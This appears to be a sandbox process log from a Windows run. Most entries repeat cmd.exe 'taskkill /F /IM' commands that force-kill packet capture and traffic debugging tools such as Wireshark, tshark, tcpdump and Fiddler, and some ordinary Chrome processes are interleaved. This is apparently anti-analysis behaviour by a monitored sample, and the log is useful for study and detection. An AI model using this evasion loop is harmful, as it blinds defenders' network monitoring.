C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6e3fab58,0x7ffc6e3fab68,0x7ffc6e3fab78
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3088 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4412 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4520 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4940 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
